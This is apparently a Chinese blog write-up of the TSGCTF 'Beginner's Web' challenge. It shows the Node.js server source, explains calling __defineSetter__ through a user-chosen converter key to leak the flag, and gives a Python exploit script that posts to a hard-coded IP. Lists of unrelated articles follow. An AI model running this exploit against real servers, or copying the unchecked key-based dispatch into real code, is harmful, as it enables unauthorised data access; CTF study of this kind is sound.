const fastify = require('fastify');

 const nunjucks = require('nunjucks');

 const crypto = require('crypto');

 const converters = {};

 const flagConverter = (input, callback) => {

   const flag = '*** CENSORED ***';

   callback(null, flag);

 };

 const base64Converter = (input, callback) => {

   try {

     const result = Buffer.from(input).toString('base64');

     callback(null, result)

   } catch (error) {

     callback(error);

   }

 };

 const scryptConverter = (input, callback) => {

   crypto.scrypt(input, 'I like sugar', 64, (error, key) => {

     if (error) {

       callback(error);

     } else {

       callback(null, key.toString('hex'));

     }

   });

 };

 const app = fastify();

 app.register(require('point-of-view'), {engine: {nunjucks}});

 app.register(require('fastify-formbody'));

 app.register(require('fastify-cookie'));

 app.register(require('fastify-session'), {secret: Math.random().toString(2), cookie: {secure: false}});

 app.get('/', async (request, reply) => {

   reply.view('index.html', {sessionId: request.session.sessionId});

 });

 app.post('/', async (request, reply) => {

   if (request.body.converter.match(/[FLAG]/)) {

     throw new Error("Don't be evil :)");

   }

   if (request.body.input.length < 10) {

     throw new Error('Too short :(');

   }

   converters['base64'] = base64Converter;

   converters['scrypt'] = scryptConverter;

   converters[`FLAG_${request.session.sessionId}`] = flagConverter;

   const result = await new Promise((resolve, reject) => {

     converters[request.body.converter](request.body.input, (error, result) => {

       if (error) {

         reject(error);

       } else {

         resolve(result);

       }

     });

   });

   reply.view('index.html', {

     input: request.body.input,

     result,

     sessionId: request.session.sessionId,

   });

 });

 app.setErrorHandler((error, request, reply) => {

   reply.view('index.html', {error, sessionId: request.session.sessionId});

 });

 app.listen(59101, '0.0.0.0');

页面下方有显示出用户sessionID,结合源码不难看出可以利用flagConverter获得flag。因为有匹配,所以直接在converter参数传入FLAG_${request.session.sessionId}是行不通的。

1.利用__defineSetter__创造出名为FLAG_${request.session.sessionId}的数组键名 (${request.session.sessionId}表示sessionID)。

__defineSetter__介绍:https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineSetter__

__defineSetter__有两个参数,第一个是属性,第二个是函数。实际上就是绑个函数在指定属性上,当指定属性被赋值时,该函数会被调用。

converters[request.body.converter](request.body.input, (error, result)是用户可控的,(error, result)是箭头函数有两个参数


所以,input输入FLAG_${request.session.sessionId},converter参数输入__defineSetter__就可以成功把(error, result)绑在FLAG_${request.session.sessionId}上。FLAG_${request.session.sessionId}对应箭头函数的第一个参数error,最后能通过error把flag输出


此时,我们需要对promise有所了解    https://blog.csdn.net/new__person/article/details/103702562




因为 __defineSetter__没有被触发,promise不会有返回结果,所以http没有response




此时应该是这样的__defineSetter(FLAG_${request.session.sessionId},(error, result) => {if (error) {reject(error);} else {resolve(result);})


我们直接回到post




红色箭头所指的是一个赋值操作,只要执行这条语句就能触发我们之前的__defineSetter__。非常的amazing啊,我们只要再发一个不会在前两个if判断挂掉的包就能成功触发。触发之后就会把FLAG_${request.session.sessionId}传入箭头函数,作为其第一个参数error,通过reject(error)输出。这里使用python发包


exp:




#!/usr/bin/python3

import threading

import requests

import time

cookie = {"sessionId" : "Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY.ZyckOkEpT1GboSRLgcE1I%2BZ52%2FqfSQEZWkq1%2F5dyJB"}

def sendPayload():

    r = requests.post("http://35.221.81.216:59101",data={"converter":"__defineSetter__","input":"FLAG_Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY"},cookies=cookie)

    print(r.text)

threading.Thread(target=sendPayload).start()

requests.post("http://35.221.81.216:59101",data={"converter":"base64","input":"55555555555555555555"},cookies=cookie)




这题叫beginner可真是太艹了
本人js菜的抠脚,如果有不对的地方,望各位师傅斧正
												


											
TSGCTF-web  Beginner's Web (js内置方法__defineSetter__)的更多相关文章
	

    
								
  1. web前端学习(四)JavaScript学习笔记部分(6)-- js内置对象
		
    1.JS内置对象-什么是对象 1.1.什么是对象: JavaScript中的所有事物都是对象:字符串.数值.数组.函数 每个对象带有属性和方法 JavaScript允许自定义对象 1.2.自定义对象: ...
    
		
    2. 
						
  2. 4、js内置函数
		
    前言:上一篇我介绍了函数的基本概念,和一些简单的Demo.其实很多函数是js内置的,我们无需自己去写,直接拿过来用即可.内置函数分为全局函数和js内置对象的函数区别:全局函数不属于任何一个内置对象.理 ...
    
		
    3. 
						
  3. 4月5日--课堂笔记--JS内置对象
		
    JavaScript 4.5 一.    JS内置对象 1.数组Array a)创建语法1:var arr=new Array(参数); i.       没有参数:创建一个初始容量为0的数组 ii. ...
    
		
    4. 
						
  4. JS内置对象有哪些?
		
    JS内置对象分为数据封装类对象和其他对象 数据封装类对象:String,Boolean,Number,Array,和Object; 其他对象:Function,Arguments,Math,Date, ...
    
		
    5. 
						
  5. JS内置对象-String对象、Date日期对象、Array数组对象、Math对象
		
    一.JavaScript中的所有事物都是对象:字符串.数组.数值.函数... 1.每个对象带有属性和方法 JavaScript允许自定义对象 2.自定义对象 a.定义并创建对象实例 b.使用函数来定义 ...
    
		
    6. 
						
  6. js  内置对象和方法  示例
		
    JS内置函数不从属于任何对象,在JS语句的任何地方都可以直接使用这些函数.JS中常用的内置函数如下: 1.eval(str)接收一个字符串形式的表达式,并试图求出表达式的值.作为参数的表达式可以采用任 ...
    
		
    7. 
						
  7. 【ES6】改变 JS 内置行为的代理与反射
		
    代理(Proxy)可以拦截并改变 JS 引擎的底层操作,如数据读取.属性定义.函数构造等一系列操作.ES6 通过对这些底层内置对象的代理陷阱和反射函数,让开发者能进一步接近 JS 引擎的能力. 一.代 ...
    
		
    8. 
						
  8. 5月15日上课笔记-js中 location对象的属性、document对象、js内置对象、Date事件对象、
		
    location的属性: host: 返回当前主机名和端口号 定时函数: setTimeout( ) setInterval() 二.document对象 getElementById(); 根据ID ...
    
		
    9. 
						
  9. JS内置对象的原型不能重定义?只能动态添加属性或方法?
		
    昨天马上就快下班了,坐在我对面的同事突然问我一个问题,我说“爱过”,哈哈,开个玩笑.情况是这样的,他发现JS的内置对象的原型好像不能通过字面量对象的形式进行覆盖, 只能动态的为内置对象的原型添加属性或 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Ajax 下载文件 文件被损坏
			
    问题表现 Ajax 下载文件成功后,打开提示格式损坏,源代码如下: axios({ method: 'get', url: "/public/工作簿1.xlsx", // 静态资源 ...
    
			
    2. 
						
  2. JavaScript图形实例:窗花图案
			
    1.窗花基本框线 设定曲线的坐标方程为: n=25; r=100; x=r/n*cos(5*θ)+r*cos(θ); y=r/n*sin(5*θ)+r*sin(θ);          (0≤θ≤2π ...
    
			
    3. 
						
  3. 深入理解RocketMQ(一)---阅读源码准备
			
    本文主要描述使用Idea获取rocketMQ源码及源码的读取. 在演示搭建源码环境前,先简要描述一下RocketMQ的设计目标. 1.架构模式 和大多数消息中间件一样,采用的是发布订阅模式,基本组件包 ...
    
			
    4. 
						
  4. MFC中窗口静态分割&视图切换
			
    目录 窗口静态分割 单个分割器 声明 准备视图 静态分割窗口&添加视图 使视图大小随窗口大小改变 多个分割器 声明 静态分割窗口&添加视图 使视图大小随窗口大小改变 视图切换 视图之间 ...
    
			
    5. 
						
  5. ASP.NET MVC 中解决Session,Cookie等依赖的方式
			
    原文:https://blog.csdn.net/mzl87/article/details/90580869 本文将分别介绍在MVC中使用Filter和Model Binding两种方式来说明如何解 ...
    
			
    6. 
						
  6. YOLOV4源码详解
			
    一. 整体架构 整体架构和YOLO-V3相同(感谢知乎大神@江大白),创新点如下: 输入端 --> Mosaic数据增强.cmBN.SAT自对抗训练: BackBone --> CSPDa ...
    
			
    7. 
						
  7. 新建Maven项目出错
			
    创建完项目后出现 弹出个窗口 出现如下信息 问题: Maven新建项目出现 Could not calculate build plan:plugin 错误解决办法 解决办法: 删除本地.m2仓库中  ...
    
			
    8. 
						
  8. 基于ASP.NET core的MVC站点开发笔记 0x01
			
    基于ASP.NET core的MVC站点开发笔记 0x01 我的环境 OS type:mac Software:vscode Dotnet core version:2.0/3.1 dotnet sd ...
    
			
    9. 
						
  9. 利用Cython对python代码进行加密
			
    利用Cython对python代码进行加密 Cython是属于PYTHON的超集,他首先会将PYTHON代码转化成C语言代码,然后通过c编译器生成可执行文件.优势:资源丰富,适合快速开发.翻译成C后速 ...
    
			
    10. 
						
  10. 一口气说出 OAuth2.0 的四种鉴权方式,面试官会高看一眼
			
    本文收录在个人博客:www.chengxy-nds.top,技术资源共享,一起进步 上周我的自研开源项目开始破土动工了,<开源项目迈出第一步,10 选 1?页面模板成了第一个绊脚石 > , ...
    
			
    11.